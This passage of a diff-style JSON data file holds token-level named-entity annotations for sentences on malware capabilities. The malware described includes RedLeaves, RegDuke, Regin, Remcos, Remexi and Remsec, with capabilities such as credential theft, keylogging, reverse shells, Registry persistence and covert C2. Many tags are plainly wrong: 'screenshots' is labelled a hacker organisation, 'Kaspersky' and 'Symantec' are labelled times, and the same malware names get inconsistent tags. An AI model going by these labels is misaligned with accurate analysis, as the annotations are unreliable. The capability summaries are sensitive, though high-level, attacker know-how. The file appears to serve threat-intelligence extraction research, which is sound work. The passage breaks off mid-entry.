"tokens": [ + "RedLeaves", + "can", + "gather", + "browser", + "usernames", + "and", + "passwords." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "is", + "launched", + "through", + "use", + "of", + "DLL", + "search", + "order", + "hijacking", + "to", + "load", + "a", + "malicious", + "dll." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "RedLeaves", + "configuration", + "file", + "is", + "encrypted", + "with", + "a", + "simple", + "XOR", + "key,", + "0x53." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "delete", + "specified", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "enumerate", + "and", + "search", + "for", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "is", + "capable", + "of", + "downloading", + "a", + "file", + "from", + "a", + "specified", + "URL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "use", + "HTTP", + "over", + "non-standard", + "ports,", + "such", + "as", + "995,", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "attempts", + "to", + "add", + "a", + "shortcut", + "file", + "in", + "the", + "Startup", + "folder", + "to", + "achieve", + "persistence.", + "If", + "this", + "fails,", + "it", + "attempts", + "to", + "add", + "Registry", + "Run", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "RedLeaves", + "attempts", + "to", + "add", + "a", + "shortcut", + "file", + "in", + "the", + "Startup", + "folder", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "has", + "encrypted", + "C2", + "traffic", + "with", + "RC4,", + "previously", + "using", + "keys", + "of", + "88888888", + "and", + "babybear." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "gather", + "extended", + "system", + "information", + "including", + "the", + "hostname,", + "OS", + "version", + "number,", + "platform,", + "memory", + "information,", + "time", + "elapsed", + "since", + "system", + "startup,", + "and", + "CPU", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "obtain", + "information", + "about", + "network", + "parameters." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "enumerate", + "drives", + "and", + "Remote", + "Desktop", + "sessions." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "obtain", + "information", + "about", + "the", + "logged", + "on", + "user", + "both", + "locally", + "and", + "for", + "Remote", + "Desktop", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "communicate", + "to", + "its", + "C2", + "over", + "HTTP", + "and", + "HTTPS", + "if", + "directed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "RedLeaves", + "can", + "receive", + "and", + "execute", + "commands", + "with", + "cmd.exe.", + "It", + "can", + "also", + "provide", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Reg", + "may", + "be", + "used", + "to", + "find", + "credentials", + "in", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reg", + "may", + "be", + "used", + "to", + "interact", + "with", + "and", + "modify", + "the", + "Windows", + "Registry", + "of", + "a", + "local", + "or", + "remote", + "system", + "at", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reg", + "may", + "be", + "used", + "to", + "gather", + "details", + "from", + "the", + "Windows", + "Registry", + "of", + "a", + "local", + "or", + "remote", + "system", + "at", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "use", + "Dropbox", + "as", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "decrypt", + "strings", + "with", + "a", + "key", + "either", + "stored", + "in", + "the", + "Registry", + "or", + "hardcoded", + "in", + "the", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "store", + "its", + "encryption", + "key", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "download", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "create", + "seemingly", + "legitimate", + "Registry", + "key", + "to", + "store", + "its", + "encryption", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "use", + "control-flow", + "flattening", + "or", + "the", + "commercially", + "available", + ".NET", + "Reactor", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "extract", + "and", + "execute", + "PowerShell", + "scripts", + "from", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "hide", + "data", + "in", + "images,", + "including", + "use", + "of", + "the", + "Least", + "Significant", + "Bit", + "(LSB)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RegDuke", + "can", + "persist", + "using", + "a", + "WMI", + "consumer", + "that", + "is", + "launched", + "every", + "time", + "a", + "process", + "named", + "WINWORD.EXE", + "is", + "started." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Regin", + "leveraged", + "several", + "compromised", + "universities", + "as", + "proxies", + "to", + "obscure", + "its", + "origin." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Regin", + "malware", + "platform", + "supports", + "many", + "standard", + "protocols,", + "including", + "SMB." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Regin", + "has", + "used", + "a", + "hidden", + "file", + "system", + "to", + "store", + "some", + "of", + "its", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Regin", + "stage", + "1", + "modules", + "for", + "64-bit", + "systems", + "have", + "been", + "found", + "to", + "be", + "signed", + "with", + "fake", + "certificates", + "masquerading", + "as", + "originating", + "from", + "Microsoft", + "Corporation", + "and", + "Broadcom", + "Corporation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Regin", + "contains", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Regin", + "appears", + "to", + "have", + "functionality", + "to", + "modify", + "remote", + "Registry", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "The", + "Regin", + "malware", + "platform", + "uses", + "Extended", + "Attributes", + "to", + "store", + "encrypted", + "executables." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Regin", + "appears", + "to", + "have", + "functionality", + "to", + "sniff", + "for", + "credentials", + "passed", + "over", + "HTTP,", + "SMTP,", + "and", + "SMB." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "Regin", + "malware", + "platform", + "can", + "use", + "ICMP", + "to", + "communicate", + "between", + "infected", + "computers." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Regin", + "malware", + "platform", + "can", + "use", + "Windows", + "admin", + "shares", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Regin", + "malware", + "platform", + "supports", + "many", + "standard", + "protocols,", + "including", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "capture", + "data", + "from", + "the", + "system’s", + "microphone." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "has", + "a", + "command", + "for", + "UAC", + "bypassing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "steals", + "and", + "modifies", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "search", + "for", + "files", + "on", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "has", + "a", + "command", + "for", + "keylogging." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "has", + "full", + "control", + "of", + "the", + "Registry,", + "including", + "the", + "ability", + "to", + "modify", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "uses", + "RC4", + "and", + "base64", + "to", + "obfuscate", + "data,", + "including", + "Registry", + "entries", + "and", + "file", + "paths." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "has", + "a", + "command", + "to", + "hide", + "itself", + "through", + "injecting", + "into", + "another", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "uses", + "the", + "infected", + "hosts", + "as", + "SOCKS5", + "proxies", + "to", + "allow", + "for", + "tunneling", + "and", + "proxying." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "uses", + "Python", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "add", + "itself", + "to", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "takes", + "automated", + "screenshots", + "of", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "searches", + "for", + "Sandboxie", + "and", + "VMware", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "access", + "a", + "system’s", + "webcam", + "and", + "take", + "pictures." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Remcos", + "can", + "launch", + "a", + "remote", + "command", + "line", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "has", + "a", + "command", + "to", + "capture", + "active", + "windows", + "on", + "the", + "machine", + "and", + "retrieve", + "window", + "titles." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "encrypts", + "and", + "adds", + "all", + "gathered", + "browser", + "data", + "into", + "files", + "for", + "upload", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "collects", + "text", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "decrypts", + "the", + "configuration", + "data", + "using", + "XOR", + "with", + "25-character", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "obfuscates", + "its", + "configuration", + "data", + "with", + "XOR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "performs", + "exfiltration", + "over", + "BITSAdmin,", + "which", + "is", + "also", + "used", + "for", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "searches", + "for", + "files", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "gathers", + "and", + "exfiltrates", + "keystrokes", + "from", + "the", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "utilizes", + "Run", + "Registry", + "keys", + "in", + "the", + "HKLM", + "hive", + "as", + "a", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "utilizes", + "scheduled", + "tasks", + "as", + "a", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-OffAct", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "takes", + "screenshots", + "of", + "windows", + "of", + "interest." + ], + "ner_tags": [ + "B-Way", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "uses", + "AutoIt", + "and", + "VBS", + "scripts", + "throughout", + "its", + "execution", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "uses", + "BITSAdmin", + "to", + "communicate", + "with", + "the", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Remexi", + "silently", + "executes", + "received", + "commands", + "with", + "cmd.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Remexi", + "executes", + "received", + "commands", + "with", + "wmic.exe", + "(for", + "WMI", + "commands)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remexi", + "achieves", + "persistence", + "using", + "Userinit", + "by", + "adding", + "the", + "Registry", + "key", + "<code>HKLM\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon\\Userinit</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteCMD", + "copies", + "a", + "file", + "over", + "to", + "the", + "remote", + "system", + "before", + "execution." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteCMD", + "can", + "execute", + "commands", + "remotely", + "by", + "creating", + "a", + "new", + "schedule", + "task", + "on", + "the", + "remote", + "system" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteCMD", + "can", + "execute", + "commands", + "remotely", + "by", + "creating", + "a", + "new", + "service", + "on", + "the", + "remote", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteUtilities", + "can", + "enumerate", + "files", + "and", + "directories", + "on", + "a", + "target", + "machine." + ], + "ner_tags": [ + "B-Org", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteUtilities", + "can", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "a", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteUtilities", + "can", + "use", + "Msiexec", + "to", + "install", + "a", + "service." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RemoteUtilities", + "can", + "take", + "screenshots", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "using", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "has", + "a", + "package", + "that", + "collects", + "documents", + "from", + "any", + "inserted", + "USB", + "sticks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "has", + "a", + "plugin", + "to", + "detect", + "active", + "drivers", + "of", + "some", + "security", + "products." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "add", + "or", + "remove", + "applications", + "or", + "ports", + "on", + "the", + "Windows", + "firewall", + "or", + "disable", + "it", + "entirely." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "perform", + "DLL", + "injection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "data", + "in", + "Remsec", + "is", + "encrypted", + "using", + "RC5", + "in", + "CBC", + "mode,", + "AES-CBC", + "with", + "a", + "hardcoded", + "key,", + "RC4,", + "or", + "Salsa20.", + "Some", + "data", + "is", + "also", + "base64-encoded." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "exfiltrate", + "data", + "via", + "a", + "DNS", + "tunnel", + "or", + "email,", + "separately", + "from", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "contains", + "a", + "module", + "to", + "move", + "data", + "from", + "airgapped", + "networks", + "to", + "Internet-connected", + "systems", + "by", + "using", + "a", + "removable", + "USB", + "device." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Remsec", + "has", + "a", + "plugin", + "to", + "drop", + "and", + "execute", + "vulnerable", + "Outpost", + "Sandbox", + "or", + "avast!", + "Virtualization", + "drivers", + "in", + "order", + "to", + "gain", + "kernel", + "mode", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "deleting", + "files", + "on", + "the", + "victim.", + "It", + "also", + "securely", + "removes", + "itself", + "after", + "collecting", + "and", + "exfiltrating", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "listing", + "contents", + "of", + "folders", + "on", + "the", + "victim.", + "Remsec", + "also", + "searches", + "for", + "custom", + "network", + "encryption", + "software", + "on", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "contains", + "a", + "network", + "loader", + "to", + "receive", + "executable", + "modules", + "from", + "remote", + "attackers", + "and", + "run", + "them", + "on", + "the", + "local", + "victim.", + "It", + "can", + "also", + "upload", + "and", + "download", + "files", + "over", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Remsec", + "contains", + "a", + "keylogger", + "component." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "a", + "list", + "of", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "using", + "SMTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Remsec", + "loader", + "implements", + "itself", + "with", + "the", + "name", + "Security", + "Support", + "Provider,", + "a", + "legitimate", + "Windows", + "function.", + "Various", + "Remsec", + ".exe", + "files", + "mimic", + "legitimate", + "file", + "names", + "used", + "by", + "Microsoft,", + "Symantec,", + "Kaspersky,", + "Hewlett-Packard,", + "and", + "VMWare.", + "Remsec", + "also", + "disguised", + "malicious", + "modules", + "using", + "similar", + "filenames", + "as", + "custom", + "network", + "encryption", + "software", + "on", + "victims." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Time", + "B-Time", + "B-Org", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "has", + "a", + "plugin", + "that", + "can", + "perform", + "ARP", + "scanning", + "as", + "well", + "as", + "port", + "scanning." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "using", + "ICMP,", + "TCP,", + "and", + "UDP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "harvests", + "plain-text", + "credentials", + "as", + "a", + "password", + "filter", + "registered", + "on", + "domain", + "controllers." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "a", + "process", + "list", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + 